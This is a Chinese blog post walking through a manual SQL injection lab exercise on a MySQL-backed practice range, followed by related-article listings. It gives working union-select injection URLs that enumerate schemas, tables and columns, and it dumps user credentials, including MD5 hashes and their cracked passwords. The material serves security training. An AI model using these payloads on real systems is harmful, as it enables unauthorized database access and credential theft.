SQL手工注入漏洞测试(MySQL数据库)

已于 2022-12-15 17:23:56 修改
阅读量945 收藏 7
点赞数 2
分类专栏: SQL注入 文章标签: 数据库 sql 安全 web安全 mysql
于 2022-12-15 17:23:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/128332212
版权

目录

手工注入顺序 

    

    1、判断是否存在注入

    2、判断字段

    3、判断回显点

    4、获取所有数据库

    5、获取当前数据库的所有表

    6、选择一个表获取所有字段

    7、获取数据

打开靶场

两个页面,第二个页面存在注入

 

 1、判断是否存在注入

http://124.70.22.208:49270/new_list.php?id=1 and 1=1

http://124.70.22.208:49270/new_list.php?id=1 and 1=2

正常

错误

 

 存在注入

2、判断字段

http://124.70.22.208:49270/new_list.php?id=1 order by 4

 

 字段数为4

3、判断回显点

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,2,3,4

回显点为2、3

 查看数据库用户、版本、操作系统、当前数据库

用户:user()

当前数据库:database()

版本:version()

操作系统:@@version_compile_os

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,version(),user(),4

 http://124.70.22.208:49270/new_list.php?id=-1 union select 1,database(),@@version_compile_os,4

 4、获取所有数据库

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4

 5、获取当前数据库的所有表

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4

 6、选择一个表获取所有字段

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='StormGroup_member'),4

 

 7、获取数据

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

 

用户名:mozhe

密码:356f589a7df439f6f744ff19bb8092c0

md5解密得到密码为:dsan13

登录

获取另外个数据

http://124.70.22.208:49270/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1

 密码:f6cf352f816dc0a39f2b40abd6c996cb

解密得:768619

登录成功

 

 

鸡肋是鸡肋!
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)...SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 816
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1020
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
2024年软件测试最全渗透测试-SQL注入检测_sql注入 在线检测(1),看这篇足矣了
2401_84765537的博客
05-09 768
而当我们使用 用户名‘:–的时候,!这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且。: SQL注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情下操作数据库
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1238
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1672
MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
weixin_47118413的博客
06-21 2357
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
SQL注入漏洞是网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
sql server 2008 mysql 手工注入
03-25
手工注入,特别是SQL注入,是一种常见的安全漏洞,它允许攻击者通过构造恶意SQL语句来操纵或获取数据库中的敏感信息。在这个主题中,我们将深入探讨这两种数据库系统的SQL注入及其防范方法。 首先,SQL注入的原理是...
SQL注入漏洞挖掘.pptx
10-27
SQL 注入漏洞测试方式可以分为两种:手工测试和自动化测试手工测试是指攻击者手动构造测试语句,并分析返回结果,以判断是否存在 SQL 注入漏洞手工测试的优点是灵活性高,测试范围广泛,但缺点是效率低,...
SQL注入漏洞挖掘.ppt
10-27
2. **手工测试**:通过构造特定的输入,观察应用的反应来判断是否存在注入漏洞手工测试更灵活,但效率较低,依赖于测试者的技能水平。 ### 手工测试的类型 1. **内联SQL注入**:攻击者插入的SQL语句与原始SQL...
SQL注入手工检测
热门推荐
zzkkoo8的博客
12-15 1万+
1基本检测 2绕过技巧2017年12月14日 09:36:161、基本检测 数字型 $id=@$_GET['id']; //id未经过滤 $sql = "SELECT * FROM sqltest WHERE id='$id'";判断 asp?id=49' //报错 asp?id=49 and 1=1 asp?id=49 and 1=2判断什么型 ?id=1%2b1 //加法减法,可区分数字
墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
weixin_42789937的博客
01-24 465
墨者学院01 SQL手工注入漏洞测试(MySQL数据库),小白友好的SQL实战~
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3563
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3898
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
sql手工注入漏洞测试(mysql数据库)
06-28
SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值